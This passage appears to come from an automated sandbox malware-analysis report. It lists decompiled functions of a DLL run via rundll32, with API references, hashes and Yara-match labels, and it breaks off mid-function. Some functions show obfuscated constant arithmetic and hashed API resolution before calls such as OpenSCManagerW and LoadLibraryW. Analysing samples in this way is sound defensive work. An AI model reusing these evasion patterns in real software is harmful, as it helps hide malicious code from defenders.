VirtualAlloc.KERNELBASE(10002A49,00000000,00001000,00000004,10002159,00000000,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 1000246C
und_memcpy.LIBVCRUNTIME ref: 10002486

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual$und_memcpy
String ID:
API String ID: 459566808-0
Opcode ID: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction ID: 3a73c48f6b60900e827596c0a710fe36c4357a7f1bbc63153c5bd30976a621be
Opcode Fuzzy Hash: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction Fuzzy Hash: 4E3178B2A00116AFEB10CF58DD85F9AB7E8EF08790F118015FA04EB245D770EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000398B, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000398B(void* __ecx, void* __edx) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				char _t84;
				signed int _t85;
				void* _t88;
				void* _t89;
				void* _t101;
				void* _t105;
				signed int _t109;
				void* _t112;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				void* _t122;

				_t104 = __edx;
				_t88 = __ecx;
				_push(0x10);
				E100040F0();
				_t43 = E100035EC(_t88, __edx, 0); // executed
				_t89 = 0x1004aee8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t122 - 0x1d)) = E100034F1();
					_t84 = 1;
					 *((char*)(_t122 - 0x19)) = 1;
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_t130 =  *0x1004dc44;
					if( *0x1004dc44 != 0) {
						E10003EE0(_t104, _t105, _t112, 7);
						asm("int3");
						_push(0x10);
						_push(0x1004af08);
						E100040F0();
						_t48 =  *0x1004dc68; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x1004dc68 = _t48 - 1;
							 *(_t122 - 0x1c) = 1;
							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
							 *((char*)(_t122 - 0x20)) = E100034F1();
							 *(_t122 - 4) = 1;
							__eflags =  *0x1004dc44 - 2;
							if( *0x1004dc44 != 2) {
								E10003EE0(_t104, 1, _t112, 7);
								asm("int3");
								_push(0xc);
								_push(0x1004af30);
								E100040F0();
								_t109 =  *(_t122 + 0xc);
								__eflags = _t109;
								if(_t109 != 0) {
									L23:
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										L26:
										_t85 =  *(_t122 + 0x10);
										_t114 = E10003C4D( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
										 *(_t122 - 0x1c) = _t114;
										__eflags = _t114;
										if(_t114 != 0) {
											_t55 = E10003938(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
											_t114 = _t55;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t114;
											if(_t114 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t109 - 2;
										if(_t109 == 2) {
											goto L26;
										} else {
											_t85 =  *(_t122 + 0x10);
											L28:
											_push(_t85);
											_push(_t109);
											_push( *((intOrPtr*)(_t122 + 8)));
											_t56 = E10004518();
											_t114 = _t56;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t109 - 1;
											if(_t109 == 1) {
												__eflags = _t114;
												if(_t114 == 0) {
													_push(_t85);
													_push(_t56);
													_push( *((intOrPtr*)(_t122 + 8)));
													_t59 = E10004518();
													__eflags = _t85;
													_t34 = _t85 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t89);
													E10003C4D( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
												}
											}
											__eflags = _t109;
											if(_t109 == 0) {
												L33:
												_t114 = E10003938(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
												 *(_t122 - 0x1c) = _t114;
												__eflags = _t114;
												if(_t114 != 0) {
													_t114 = E10003C4D( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
													 *(_t122 - 0x1c) = _t114;
												}
											} else {
												__eflags = _t109 - 3;
												if(_t109 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t122 - 4) = 0xfffffffe;
									_t54 = _t114;
								} else {
									__eflags =  *0x1004dc68 - _t109; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
								return _t54;
							} else {
								E100035BC(_t89);
								E1000452A();
								E10004591();
								 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
								E10003B27();
								_t67 = E1000375D( *((intOrPtr*)(_t122 + 8)), 0);
								asm("sbb esi, esi");
								_t118 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t118;
								 *(_t122 - 0x1c) = _t118;
								 *(_t122 - 4) = 0xfffffffe;
								E10003B34();
								_t69 = _t118;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
							return _t69;
						}
					} else {
						 *0x1004dc44 = 1;
						if(E1000354E(_t130) != 0) {
							E1000451E(E10004565());
							E10004542();
							_t80 = E10011F7E(0x10042250, 0x10042260); // executed
							_pop(_t101);
							if(_t80 == 0 && E10003523(1, _t101, _t104) != 0) {
								E10011F39(_t101, 0x10042244, 0x1004224c);
								 *0x1004dc44 = 2;
								_t84 = 0;
								 *((char*)(_t122 - 0x19)) = 0;
							}
						}
						 *(_t122 - 4) = 0xfffffffe;
						E10003A6E();
						if(_t84 != 0) {
							goto L11;
						} else {
							_t120 = E1000455F();
							if( *_t120 != 0) {
								_push(_t120);
								if(E100036AC() != 0) {
									 *0x1004223c( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
									 *((intOrPtr*)( *_t120))();
								}
							}
							 *0x1004dc68 =  *0x1004dc68 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
						return _t44;
					}
				}
			}

0x1000398b
0x1000398b
0x1000398b
0x10003992
0x10003999
0x1000399e
0x100039a1
0x10003a78
0x10003a78
0x10003a78
0x00000000
0x100039a7
0x100039ac
0x100039af
0x100039b1
0x100039b4
0x100039b8
0x100039bf
0x10003a8c
0x10003a91
0x10003a92
0x10003a94
0x10003a99
0x10003a9e
0x10003aa3
0x10003aa5
0x10003aac
0x10003ab4
0x10003ab7
0x10003ac0
0x10003ac3
0x10003ac6
0x10003acd
0x10003b3c
0x10003b41
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b51
0x10003b53
0x10003b64
0x10003b64
0x10003b68
0x10003b6b
0x10003b77
0x10003b77
0x10003b84
0x10003b86
0x10003b89
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba0
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b6d
0x10003b6d
0x10003b70
0x00000000
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bb7
0x10003bba
0x10003bbc
0x10003bbe
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bc5
0x10003bca
0x10003bcc
0x10003bcc
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003bbe
0x10003be3
0x10003be5
0x10003bec
0x10003bf6
0x10003bf8
0x10003bfb
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003be7
0x10003be7
0x10003bea
0x00000000
0x00000000
0x10003bea
0x10003be5
0x10003b70
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c
0x10003acf
0x10003acf
0x10003ad4
0x10003ad9
0x10003ade
0x10003ae5
0x10003ae9
0x10003af3
0x10003aff
0x10003b01
0x10003b01
0x10003b03
0x10003b06
0x10003b0d
0x10003b12
0x00000000
0x10003b12
0x10003aa7
0x10003aa7
0x10003b14
0x10003b17
0x10003b23
0x10003b23
0x100039c5
0x100039c5
0x100039d6
0x100039dd
0x100039e2
0x100039f1
0x100039f7
0x100039fa
0x10003a0f
0x10003a16
0x10003a20
0x10003a22
0x10003a22
0x100039fa
0x10003a25
0x10003a2c
0x10003a33
0x00000000
0x10003a35
0x10003a3a
0x10003a3f
0x10003a41
0x10003a4a
0x10003a58
0x10003a5e
0x10003a5e
0x10003a4a
0x10003a60
0x10003a68
0x10003a68
0x10003a7a
0x10003a7d
0x10003a89
0x10003a89
0x100039bf

APIs

__RTC_Initialize.LIBCMT ref: 100039D8

Part of subcall function 1000451E: InitializeSListHead.KERNEL32(1004DF98,100039E2,1004AEE8,00000010,10003973,?,?,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30), ref: 10004523

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10003A42
___scrt_fastfail.LIBCMT ref: 10003A8C

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction ID: aaaeb18818c0cc7d7fa6837dad01f7d3ce33b48f6eafd4b856e1f1e091e85652
Opcode Fuzzy Hash: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction Fuzzy Hash: 2B2138397086526EFB06EB788D033DE3399DF032E5F108029E581A71D7CFB16540C61A

Uniqueness

Uniqueness Score: -1.00%

Function 10028D2F, Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028D2F(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E10028CEB(_t26) - _t26 >> 1;
					_t7 = E10028BDD(0, 0, _t26, E10028CEB(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E10024214(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E10028BDD(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E100268B3(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x10028d3e
0x10028d44
0x10028d9f
0x10028d9f
0x10028d46
0x10028d54
0x10028d5a
0x10028d62
0x10028d67
0x00000000
0x10028d69
0x10028d6a
0x10028d6f
0x10028d74
0x10028d94
0x10028d8e
0x10028d8e
0x10028d90
0x10028d90
0x10028d97
0x10028d9c
0x10028d67
0x10028da3
0x10028da6
0x10028da6
0x10028db2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 10028D38
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10028DA6

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 10028D97

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction ID: 716052fe855ea13665ebf5abd246c7cbf7d1e3688c183941c68cdbe58b348785
Opcode Fuzzy Hash: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction Fuzzy Hash: 3F01F7BA6032113B776186B67C88C7F2AEDCDC29A03950128FE04D2182EE609E0583B1

Uniqueness

Uniqueness Score: -1.00%

Function 10027FC1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027FC1(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebp;
				signed int _t60;
				char _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				char _t83;
				signed int _t86;
				signed char _t87;
				char _t88;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;

				_t60 =  *0x1004d054; // 0x940b3682
				_v8 = _t60 ^ _t94;
				_t93 = _a4;
				if( *(_t93 + 4) == 0xfde9) {
					L19:
					__eflags = 0;
					_t83 = 0;
					do {
						_t46 = _t83 - 0x61; // -97
						_t90 = _t46;
						_t47 = _t90 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t90 - 0x19;
							if(_t90 > 0x19) {
								_t63 = 0;
							} else {
								 *(_t93 + _t83 + 0x19) =  *(_t93 + _t83 + 0x19) | 0x00000020;
								_t56 = _t83 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t93 + _t83 + 0x19) =  *(_t93 + _t83 + 0x19) | 0x00000010;
							_t52 = _t83 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *((char*)(_t93 + _t83 + 0x119)) = _t63;
						_t83 = _t83 + 1;
						__eflags = _t83 - 0x100;
					} while (_t83 < 0x100);
					L26:
					return E100037EA(_t63, _v8 ^ _t94, _t90);
				}
				_t5 = _t93 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t68 = 0;
					do {
						 *((char*)(_t94 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t86 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t102 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t90 =  *(_t86 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t90;
							if(_t70 > _t90) {
								break;
							}
							__eflags = _t70 - 0x100;
							if(_t70 >= 0x100) {
								break;
							}
							 *((char*)(_t94 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t86 = _t86 + 2;
						__eflags = _t86;
						_t69 =  *_t86;
					}
					_t14 = _t93 + 4; // 0xe8458d00
					E1002E537(_t90, _t102, 0, 1,  &_v264, 0x100,  &_v1800,  *_t14, 0);
					_t17 = _t93 + 4; // 0xe8458d00
					_t20 = _t93 + 0x21c; // 0x42d23303
					E100318A5(_t102, 0,  *_t20, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t17, 0); // executed
					_t22 = _t93 + 4; // 0xe8458d00
					_t24 = _t93 + 0x21c; // 0x42d23303
					E100318A5(_t102, 0,  *_t24, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t22, 0);
					_t80 = 0;
					do {
						_t87 =  *(_t94 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t87 & 0x00000001) == 0) {
							__eflags = _t87 & 0x00000002;
							if((_t87 & 0x00000002) == 0) {
								_t88 = 0;
							} else {
								 *(_t93 + _t80 + 0x19) =  *(_t93 + _t80 + 0x19) | 0x00000020;
								_t88 =  *((intOrPtr*)(_t94 + _t80 - 0x304));
							}
						} else {
							 *(_t93 + _t80 + 0x19) =  *(_t93 + _t80 + 0x19) | 0x00000010;
							_t88 =  *((intOrPtr*)(_t94 + _t80 - 0x204));
						}
						 *((char*)(_t93 + _t80 + 0x119)) = _t88;
						_t80 = _t80 + 1;
					} while (_t80 < 0x100);
					goto L26;
				}
			}

0x10027fcc
0x10027fd3
0x10027fd8
0x10027fe3
0x100280f5
0x100280f5
0x100280fc
0x100280fe
0x100280fe
0x100280fe
0x10028101
0x10028104
0x10028107
0x10028113
0x10028116
0x10028124
0x10028118
0x1002811b
0x1002811f
0x1002811f
0x1002811f
0x10028109
0x10028109
0x1002810e
0x1002810e
0x1002810e
0x10028126
0x1002812d
0x1002812e
0x1002812e
0x10028132
0x10028140
0x10028140
0x10027ff0
0x10027ffb
0x00000000
0x10028001
0x10028008
0x1002800a
0x1002800a
0x10028011
0x10028012
0x10028016
0x1002801c
0x10028022
0x1002804a
0x1002804a
0x1002804c
0x00000000
0x00000000
0x1002802b
0x1002802f
0x10028041
0x10028041
0x10028043
0x00000000
0x00000000
0x10028034
0x10028036
0x00000000
0x00000000
0x10028038
0x10028040
0x10028040
0x10028040
0x10028045
0x10028045
0x10028048
0x10028048
0x1002804f
0x10028064
0x1002806a
0x1002807e
0x10028085
0x10028094
0x100280a6
0x100280ad
0x100280b5
0x100280b7
0x100280b7
0x100280c2
0x100280d2
0x100280d5
0x100280e5
0x100280d7
0x100280d7
0x100280dc
0x100280dc
0x100280c4
0x100280c4
0x100280c9
0x100280c9
0x100280e7
0x100280ee
0x100280ef
0x00000000
0x100280f3

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 10027FF3

Strings

, xrefs: 10028038

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction ID: e87e1bac75f9c46fc66be9f70f9a8a28e7f0d75fdbebaedb1d1c5d1f5bc6a8a6
Opcode Fuzzy Hash: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction Fuzzy Hash: 644158745052989BEB61CA14DDC4BEB7BFDEB15304FA044ACFACA87082D235AF498B10

Uniqueness

Uniqueness Score: -1.00%

Function 00182959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00182959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0018602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001907A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0018295f
0x00182964
0x00182967
0x0018296a
0x0018296d
0x0018296e
0x0018296f
0x00182977
0x00182985
0x0018298a
0x00182992
0x0018299a
0x001829a2
0x001829a9
0x001829b0
0x001829b7
0x001829bb
0x001829cf
0x001829dc
0x001829e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001829DC

Strings

<^, xrefs: 00182977

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: f4ad79579a16471132faad44022c5b9609d97bebbfd4be65772d441c31b34403
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 51016D72A00108BFEB18DF95DC0A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0018C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0018C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0018602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001907A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0018c6e1
0x0018c6e6
0x0018c6f0
0x0018c6fc
0x0018c703
0x0018c706
0x0018c70d
0x0018c711
0x0018c715
0x0018c71c
0x0018c723
0x0018c72a
0x0018c731
0x0018c738
0x0018c751
0x0018c762
0x0018c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0018C762

Strings

/O, xrefs: 0018C6E6

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 0e69c988dee43b604a241af351fed52eb6314b501f17457bf5a604c174447e13
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 961122B290122DBBCF259F94DC498EFBFB9EF14714F108188B90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00181000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00181000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0018602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001907A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00181006
0x00181009
0x0018100c
0x00181011
0x00181016
0x0018101d
0x00181026
0x0018102d
0x00181034
0x0018103b
0x00181047
0x0018104f
0x00181057
0x0018105e
0x00181065
0x0018106c
0x00181073
0x00181077
0x0018108b
0x00181096
0x0018109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00181096

Strings

[, xrefs: 0018103B

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: a7e50eb4bed33be62cf5fce06bcfa83da7aac31e36430cfaf8ba672f571a992c
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 76015BB6D01308BBDF04DFD4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00184859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00184859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001907A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0018485e
0x0018487a
0x0018487d
0x00184884
0x0018488b
0x00184892
0x0018489d
0x001848a0
0x001848ad
0x001848b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001848B7

Strings

[, xrefs: 0018488B

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 899a1408b3932fd8c6a271a87579ab026aee5233e7c5f238a5744d221645db2b
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 6EF0F4B0A05209BBDB08CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 1002A310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002A310(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				int _t7;
				intOrPtr* _t11;

				_t11 = E10029D17(0x12, "InitializeCriticalSectionEx", 0x10045994, 0x1004599c);
				if(_t11 == 0) {
					_t7 = InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
					return _t7;
				}
